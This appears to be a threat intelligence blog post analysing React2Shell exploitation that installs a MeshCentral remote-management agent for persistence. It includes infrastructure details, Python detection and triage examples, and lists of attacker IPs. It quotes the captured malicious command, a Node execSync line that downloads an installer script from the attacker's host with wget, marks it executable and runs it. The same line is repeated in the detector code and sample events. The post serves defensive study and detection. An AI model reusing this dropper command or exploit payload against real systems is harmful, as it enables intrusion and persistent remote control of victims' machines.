While spelunking through the noise of React2Shell initial access payloads, we were diverted down a side quest when we spotted an exploit attempting to drop a well-known Remote Monitoring and Management (RMM) agent: MeshCentral. The execution chain is a classic exploit-to-RMM-agent-to-persistence sequence, a simple but powerful combination, and it led us to check just how “Mesh-y” our GreyNoise data has become.
Initial Access & Payload Analysis
The exploit arrived as a React Server Components Unsafe Deserialization RCE Attempt, leveraging the recently disclosed CVE-2025-55182 and CVE-2025-66478. The malicious request payload was a standard JSON structure with the _prefix field containing the command for persistence.
| Key Attack Details | Value/Description |
|---|---|
| Exploit | React2Shell (CVE-2025-55182 / CVE-2025-66478) |
| Attacker IP | 74.93.203.1 |
| Source Geo | Odenton, Maryland, United States (ASN: AS7922, Comcast) |
| Malicious Command | process.mainModule.require("child_process").execSync('wget "https://check.aupporte.com/meshagents?script=1" --no-check-certificate -O /tmp/meshinstall.sh && chmod +x /tmp/meshinstall.sh && /tmp/meshinstall.sh https://check.aupporte.com 'aWU1moxv3TXRcPk1GHhGGkg4yIJITOK1ZWkcXwggQmzehGT9az81MxSgXJ3bicQA''); |
The exploit’s goal is immediately clear: to download, set permissions, and execute a shell script (/tmp/meshinstall.sh) that installs a MeshCentral agent, establishing persistent access.
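As an added example (not GreyNoise tooling and not code from the page), the following Python shows how a WAF or request-log pipeline could inspect a React Server Components body, decide whether the _prefix field is carrying a command rather than a rendering prefix, and pull out the IOCs a responder needs (staging URLs and hosts, dropped paths, the long device-group token). The command string is the one observed above; the JSON wrapper around it and the benign sample body are constructed, since the full captured request is not reproduced here.

```python
import json
import re
from urllib.parse import urlsplit

# Node.js command-execution primitives seen in the observed _prefix payload.
EXEC_PATTERNS = [
    r"process\.mainModule\.require",
    r"child_process",
    r"\bexecSync\s*\(",
    r"\bspawn(?:Sync)?\s*\(",
]

# Shell-level signs of a download, chmod, run dropper chain.
DROPPER_PATTERNS = [
    r"\b(?:wget|curl)\b",
    r"--no-check-certificate|--insecure",
    r"chmod\s+\+x",
    r"/tmp/\S+\.sh",
    r"meshagents\?script=1",  # MeshCentral's installer-script download endpoint
]

URL_RE = re.compile(r"https?://[^\s\"'()]+")
PATH_RE = re.compile(r"/(?:tmp|var/tmp|dev/shm)/[\w.\-]+")
TOKEN_RE = re.compile(r"\b[A-Za-z0-9]{40,}\b")  # long opaque IDs such as a device group ID


def analyze_rsc_payload(body):
    """Return a verdict and extracted IOCs for one React Server Components
    request body. Non-JSON bodies and bodies without a string _prefix are
    reported as not suspicious rather than raising."""
    result = {"suspicious": False, "reasons": [], "urls": [], "hosts": [],
              "paths": [], "tokens": []}
    try:
        data = json.loads(body)
    except (TypeError, ValueError):
        return result
    if not isinstance(data, dict) or not isinstance(data.get("_prefix"), str):
        return result
    prefix = data["_prefix"]

    for pat in EXEC_PATTERNS:
        if re.search(pat, prefix):
            result["reasons"].append("exec:" + pat)
    for pat in DROPPER_PATTERNS:
        if re.search(pat, prefix):
            result["reasons"].append("dropper:" + pat)
    if not result["reasons"]:
        return result

    result["suspicious"] = True
    result["urls"] = sorted(set(URL_RE.findall(prefix)))
    result["hosts"] = sorted({h for h in (urlsplit(u).hostname for u in result["urls"]) if h})
    result["paths"] = sorted(set(PATH_RE.findall(prefix)))
    result["tokens"] = sorted(set(TOKEN_RE.findall(prefix)))
    return result


# The command string is the one observed in the exploit above; the JSON
# wrapper is a constructed minimal body, not the full captured request.
OBSERVED_COMMAND = (
    "process.mainModule.require(\"child_process\").execSync('wget "
    "\"https://check.aupporte.com/meshagents?script=1\" --no-check-certificate "
    "-O /tmp/meshinstall.sh && chmod +x /tmp/meshinstall.sh && "
    "/tmp/meshinstall.sh https://check.aupporte.com "
    "'aWU1moxv3TXRcPk1GHhGGkg4yIJITOK1ZWkcXwggQmzehGT9az81MxSgXJ3bicQA'');"
)
MALICIOUS_BODY = json.dumps({"_prefix": OBSERVED_COMMAND})
BENIGN_BODY = json.dumps({"_prefix": "app/"})  # constructed, harmless value

if __name__ == "__main__":
    print(json.dumps(analyze_rsc_payload(MALICIOUS_BODY), indent=2))
    print(analyze_rsc_payload(BENIGN_BODY)["suspicious"])
```

The extracted hosts and paths are what you would feed into DNS and proxy blocklists and endpoint hunts; the token is worth keeping as a pivot, since the same device group ID ties every victim back to one MeshCentral server.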
Domain and Infrastructure Investigation
The malicious domain, aupporte.com, was registered very recently (just a few weeks before the attack):
- Domain Name: AUPPORTE.COM
- Creation Date: 2025-11-17T20:31:40Z
- Registrar: NameCheap, Inc.
- Registry Expiry: 2026-11-17T20:31:40Z
The staging host, check.aupporte.com, resolves to the IP address 62.60.135.34.
- Staging IP: 62.60.135.34
- Hosting Geo: Tehran, Iran, Islamic Republic Of
- Autonomous System (AS): AS208137 (FPS12 Feo Prest SRL, RO)

Curiously, Censys also shows this IP as being located in Kerkrade, Netherlands (IPNET AOFB-TELECOM). A disparity like this between geolocation sources can be a flag for potentially compromised or fast-flux infrastructure, but it is also a cautionary tale about placing too much trust in even country-level geolocation.
MeshCentral Installer Script
The shell script, meshinstall.sh (SHA256: bf876e0af91ca494469be4b45b170e698913c89a37a291e6d3b755c7edd5fb81), is a standard MeshCentral Bash installer used to deploy the MeshCentral agent.
The script performs the following key functions:
- CheckStartupType: Detects the platform’s startup system (systemd, Upstart, init.d, or BSD).
- UpdateMshFile: Updates the MeshCentral settings file (meshagent.msh) to include the detected StartupType.
- CheckInstallAgent: Validates the arguments, determines the host’s machine ID (machineid) based on architecture (x86_64, armv6l, aarch64, etc.) and OS, and then calls DownloadAgent.
- DownloadAgent: Downloads the platform-specific meshagent binary and the device group settings (meshagent.msh) from the malicious host. If HTTPS fails, it falls back to HTTP.
- Installation: The script executes the downloaded agent with the full install command: ./meshagent -fullinstall --copy-msh=1 $webproxy
Notably, the script checks if the user is root before proceeding with the install/uninstall logic, echoing the requirement: “Must be root to install or uninstall the agent”. The unique, lengthy string passed as the deviceGroupId in the initial exploit command (aWU1moxv3TXRcPk1GHhGGkg4yIJITOK1ZWkcXwggQmzehGT9az81MxSgXJ3bicQA) is consistent with the MeshCentral installation process.
MeshCentral in the Wild
Given this explicit use of MeshCentral for post-exploitation persistence, we pivoted to gauge the wider presence of MeshCentral nodes that could potentially be either targets or parts of an attacker-controlled network.

Censys currently tracks ~5,700 MeshCentral nodes globally. The US leads the host count with 1,456, followed by Germany (855), and France (431).
In the GreyNoise Observation Grid over the past 90 days, we’ve seen 116 unique IPs associated with MeshCentral. While most of this traffic is associated with common noise (e.g., Mirai scanning), we have confirmed two IPs in the past week conducting React Server Components Unsafe Deserialization CVE-2025-55182 RCE Attempts:
| IP | ASN | Organization | Source Country | First Seen |
|---|---|---|---|---|
| 72.62.67.33 | AS47583 | Hostinger International Limited | Malaysia | 2025-12-06 |
| 45.32.102.91 | AS20473 | The Constant Company, LLC | Singapore | 2025-12-05 |
These two IPs, together with the one that kicked off this investigation (74.93.203.1), are a clear sign that threat actors are operationalizing React2Shell with an eye toward dropping RMM agents like MeshCentral for long-term control.
A more troubling observation is the ramp-up in use of MeshCentral in attacker campaigns seen in GreyNoise:

They’re in some truly bad neighborhoods:
| ip | asn | organization | source_country | first_seen |
|---|---|---|---|---|
| 45.77.25.135 | AS20473 | The Constant Company, LLC | Japan | 2025-11-07 |
| 188.235.255.24 | AS50544 | JSC “ER-Telecom Holding” | Russia | 2025-11-07 |
| 217.25.230.193 | AS6856 | AO IK “Informsvyaz-Chernozemye” | Russia | 2025-11-07 |
| 5.19.252.106 | AS41733 | JSC “ER-Telecom Holding” | Russia | 2025-11-07 |
| 155.212.24.85 | AS3226 | OOO “NI” | Russia | 2025-11-07 |
| 94.231.165.233 | AS48940 | Link Ltd. | Russia | 2025-11-07 |
| 46.146.204.160 | AS12768 | JSC “ER-Telecom Holding” | Russia | 2025-11-07 |
| 31.148.19.243 | AS49811 | Uzlovaya.net Ltd | Russia | 2025-11-07 |
| 46.166.94.58 | AS15774 | Limited Liability Company “TTK-Svyaz” | Russia | 2025-11-07 |
| 85.12.204.111 | AS28890 | INSYS ISP | Russia | 2025-11-07 |
| 89.248.163.209 | AS202425 | IP Volume inc | Netherlands | 2025-11-08 |
| 5.181.177.108 | AS214677 | Matteo Martelloni trading as DELUXHOST | Netherlands | 2025-11-08 |
| 89.223.87.218 | AS56534 | Comfortel Ltd. | Russia | 2025-11-10 |
| 78.140.8.151 | AS31357 | Limited Company Information and Consulting Agency | Russia | 2025-11-10 |
| 195.208.164.131 | AS34858 | Telezon-Seti LLC | Russia | 2025-11-10 |
| 83.69.215.234 | AS29226 | JSC Mastertel | Russia | 2025-11-10 |
| 91.215.189.209 | AS49701 | RIA Link Ltd | Russia | 2025-11-10 |
| 194.147.222.80 | AS48551 | Sindad Network Technology PJSC | Iran | 2025-11-11 |
| 85.113.58.83 | AS34533 | JSC “ER-Telecom Holding” | Russia | 2025-11-11 |
| 109.195.4.153 | AS50498 | JSC “ER-Telecom Holding” | Russia | 2025-11-11 |
| 109.206.128.175 | AS47914 | OOO Creative Direct Marketing Solutions | Russia | 2025-11-11 |
| 209.15.114.189 | AS135566 | Thailand Government Data Center and Cloud service (TGDCC) | Thailand | 2025-11-11 |
| 146.66.164.235 | AS42893 | Home Internet Ltd | Russia | 2025-11-12 |
| 212.15.50.92 | AS210928 | RDB 24, Ltd. | Russia | 2025-11-12 |
| 213.32.110.217 | AS16276 | OVH SAS | France | 2025-11-13 |
| 176.97.103.47 | AS47236 | CityLink Ltd | Russia | 2025-11-13 |
| 93.115.175.99 | AS199785 | Cloud Hosting Solutions, Limited. | Germany | 2025-11-14 |
| 78.157.253.58 | AS42742 | InterkamService LLC | Russia | 2025-11-14 |
| 62.60.131.43 | AS208137 | Feo Prest SRL | Netherlands | 2025-11-15 |
| 185.253.100.58 | AS12494 | OOO “Post ltd” | Russia | 2025-11-17 |
| 83.220.43.58 | AS31261 | PJSC MegaFon | Russia | 2025-11-18 |
| 154.144.247.249 | AS6713 | Office National des Postes et Telecommunications ONPT (Maroc Telecom) / IAM | Morocco | 2025-11-19 |
| 159.89.35.131 | AS14061 | DigitalOcean, LLC | United States | 2025-11-20 |
| 5.202.84.190 | AS49100 | Pishgaman Toseeh Ertebatat Company (Private Joint Stock) | Iran | 2025-11-22 |
| 185.186.50.228 | AS43395 | Pooya Parto Qeshm Cooperative Company | Iran | 2025-11-23 |
| 46.12.211.150 | AS1241 | Forthnet | Greece | 2025-11-24 |
| 213.108.39.233 | AS215179 | Smart Home Limited Liability Company | Russia | 2025-11-24 |
| 87.251.67.85 | AS212835 | Shesternin Vladimir Anatolievich | Netherlands | 2025-11-26 |
| 210.16.67.178 | AS395092 | Shock Hosting LLC | Singapore | 2025-11-26 |
| 212.102.107.20 | AS198178 | 365.partners INC | Turkey | 2025-11-26 |
| 94.154.123.101 | AS206446 | CLOUD LEASE Ltd | Israel | 2025-11-30 |
| 200.89.178.94 | AS7303 | Telecom Argentina S.A. | Argentina | 2025-12-02 |
| 67.211.217.160 | AS19318 | Interserver, Inc | United States | 2025-12-04 |
| 51.161.15.122 | AS16276 | OVH SAS | Canada | 2025-12-05 |
| 45.32.102.91 | AS20473 | The Constant Company, LLC | Singapore | 2025-12-05 |
| 72.62.67.33 | AS47583 | Hostinger International Limited | Malaysia | 2025-12-06 |
| 123.25.116.212 | AS45899 | VNPT Corp | Vietnam | 2025-12-06 |
It will be interesting to see if MeshCentral becomes the “new normal” for remote control.
We’re Tired Too
This incident highlights a persistent and frustrating reality for defenders: the tools attackers love are often the same ones your IT team relies on.
MeshCentral isn’t malware. It’s a legitimate, open-source RMM platform used by MSPs and IT departments worldwide. The binary won’t trip your AV. The network traffic looks like… well, like RMM traffic, because that’s exactly what it is. This is the “living off the land” problem scaled up. Attackers aren’t just abusing built-in OS utilities anymore; they’re deploying entire legitimate software stacks for persistence.
Compounding this is the sheer abundance of disposable infrastructure. A fresh domain on NameCheap costs pocket change. VPS providers with relaxed abuse policies are a dime a dozen. Compromised hosts are everywhere. The attacker in this case stood up aupporte.com less than a month before weaponizing it, and the staging server sits behind ambiguous geolocation that could be Tehran, could be the Netherlands—take your pick. By the time you’ve blocklisted the domain, they’ve spun up three more.
So what can defenders actually do?
- Baseline your RMM footprint. If your org uses ConnectWise but not MeshCentral, then MeshCentral showing up on an endpoint is a red flag worth investigating, regardless of whether the binary is “clean.”
- Monitor for RMM agent installations, not just executions. The -fullinstall flag, the creation of .msh config files, the systemd service registration: these are behavioral indicators that matter more than hash-based detection.
- Treat unexpected outbound connections to RMM infrastructure as suspicious. Tools like GreyNoise can help you understand whether an IP or domain has been observed in malicious contexts, but the absence of a “known bad” label doesn’t mean “known good.”
- Implement application allowlisting where feasible. Yes, it’s operationally painful. But if meshagent shouldn’t be running in your environment, preventing its execution entirely beats playing whack-a-mole with C2 domains.
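To make the installation-versus-execution point concrete, here is an added Python example (ours, not GreyNoise’s detection content and not code from the page) that runs the behavioral indicators from the installer chain above over a batch of endpoint process and file events, then applies the baseline question: is MeshCentral an RMM this organisation actually uses? The event records, the approved-RMM set, and the file paths (the .msh location and the systemd unit path) are constructed assumptions for the example; the -fullinstall flag, the meshagents?script=1 endpoint, and /tmp/meshinstall.sh are taken from the chain described on this page.

```python
import re

# RMM products this (hypothetical) organisation has sanctioned. Anything
# else showing up as an install is, by baseline, worth a ticket.
APPROVED_RMM = {"connectwise"}

# Behavioural rules derived from the installer chain described on this page:
# (event type, regex, description, severity). Paths such as the systemd unit
# location are assumptions for the example, not values taken from the script.
RULES = [
    ("process", r"\bmeshagent\b.*-fullinstall", "meshagent -fullinstall executed", "high"),
    ("process", r"^(?:\S*sh\s+)?\S*meshinstall\.sh\b", "MeshCentral installer script run", "high"),
    ("process", r"\b(?:wget|curl)\b.*meshagents\?script=1", "installer script fetched from MeshCentral server", "medium"),
    ("file", r"\.msh$", "MeshCentral .msh settings file written", "medium"),
    ("file", r"^/etc/systemd/system/\S*mesh\S*\.service$", "systemd unit registered for mesh agent", "high"),
]
COMPILED = [(t, re.compile(p), d, s) for t, p, d, s in RULES]


def match_event(event):
    """Return one alert per rule the event trips (an event may trip several)."""
    text = event.get("cmdline") if event["type"] == "process" else event.get("path", "")
    alerts = []
    for etype, rx, desc, sev in COMPILED:
        if etype == event["type"] and rx.search(text or ""):
            alerts.append({"rule": desc, "severity": sev, "user": event.get("user"), "event": text})
    return alerts


def triage(events, approved=APPROVED_RMM):
    """Run the rules over a batch of endpoint events and apply the baseline
    question from the text: is this an RMM we actually use?"""
    alerts = [a for e in events for a in match_event(e)]
    verdict = "none"
    if alerts:
        verdict = "approved_rmm_activity" if "meshcentral" in approved else "unapproved_rmm_install"
    return {"alerts": alerts, "high": sum(a["severity"] == "high" for a in alerts), "verdict": verdict}


# Constructed sample telemetry mirroring the chain above (not captured data).
SAMPLE_EVENTS = [
    {"type": "process", "user": "root",
     "cmdline": "wget https://check.aupporte.com/meshagents?script=1 --no-check-certificate -O /tmp/meshinstall.sh"},
    {"type": "process", "user": "root",
     "cmdline": "/tmp/meshinstall.sh https://check.aupporte.com aWU1moxv3TXRcPk1GHhGGkg4yIJITOK1ZWkcXwggQmzehGT9az81MxSgXJ3bicQA"},
    {"type": "file", "path": "/tmp/meshagent.msh"},
    {"type": "process", "user": "root", "cmdline": "./meshagent -fullinstall --copy-msh=1"},
    {"type": "file", "path": "/etc/systemd/system/meshagent.service"},
    {"type": "process", "user": "alice", "cmdline": "/usr/bin/vim /etc/hosts"},
    {"type": "file", "path": "/var/log/syslog"},
]

if __name__ == "__main__":
    report = triage(SAMPLE_EVENTS)
    for a in report["alerts"]:
        print(f'[{a["severity"]}] {a["rule"]}: {a["event"]}')
    print("verdict:", report["verdict"], "high:", report["high"])
```

None of these rules depend on the agent’s hash, so a rebuilt or renamed meshagent binary still trips the -fullinstall and service-registration rules. Note also that the installer must run as root, so a non-root user tripping these rules is a different (and probably failed) story than a root one.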
The uncomfortable truth is that detection engineering in 2025+ requires understanding context at a depth that signature-based approaches simply can’t provide. Attackers will keep reaching for legitimate tools because they work, they blend in, and they’re free. Defenders need visibility into what “normal” looks like in their environment—and the ability to spot when something that looks normal is anything but.
We’ll keep watching the Mesh. You keep watching your endpoints.
Appendix
All the Mesh-y IPs we saw that you should probably block inbound/outbound, look for in your logs, and alert on if you see regular comms attempts from them:
188.132.198.192
200.9.154.61
185.155.19.154
15.204.247.116
185.196.21.158
185.196.11.207
138.94.174.77
189.36.195.155
170.80.131.226
189.89.155.201
189.89.155.200
177.125.244.19
147.45.198.59
194.180.49.148
103.150.112.246
137.184.113.104
83.168.69.249
176.122.87.116
37.27.216.100
138.185.108.167
87.120.93.135
137.184.40.191
118.69.35.0
164.92.68.56
128.199.12.138
103.195.101.105
128.0.118.83
116.203.205.171
200.40.130.78
62.60.236.53
143.110.150.26
101.189.155.57
172.105.63.206
45.138.159.140
80.210.52.254
143.110.234.97
92.16.184.58
95.181.212.68
185.189.14.97
23.160.168.166
103.17.90.61
103.30.76.178
103.97.179.158
103.106.191.160
45.13.212.7
98.187.161.247
109.205.211.210
185.247.224.203
195.208.46.116
188.241.187.164
154.83.84.178
170.168.61.149
62.192.153.156
211.24.110.48
85.111.93.226
83.69.74.67
5.139.213.138
195.19.194.170
195.206.52.146
157.245.7.91
168.227.50.27
95.53.131.28
38.60.199.159
85.174.227.249
178.161.130.142
176.214.78.55
77.235.25.6
82.194.247.94
95.170.95.31
31.148.19.243
217.25.230.193
5.19.252.106
188.235.255.24
155.212.24.85
94.231.165.233
46.146.204.160
45.77.25.135
46.166.94.58
85.12.204.111
89.248.163.209
5.181.177.108
89.223.87.218
195.208.164.131
78.140.8.151
83.69.215.234
91.215.189.209
194.147.222.80
85.113.58.83
109.195.4.153
209.15.114.189
109.206.128.175
146.66.164.235
212.15.50.92
213.32.110.217
176.97.103.47
93.115.175.99
78.157.253.58
62.60.131.43
185.253.100.58
83.220.43.58
154.144.247.249
159.89.35.131
5.202.84.190
185.186.50.228
46.12.211.150
213.108.39.233
87.251.67.85
212.102.107.20
210.16.67.178
94.154.123.101
200.89.178.94
67.211.217.160
51.161.15.122
45.32.102.91
123.25.116.212
72.62.67.33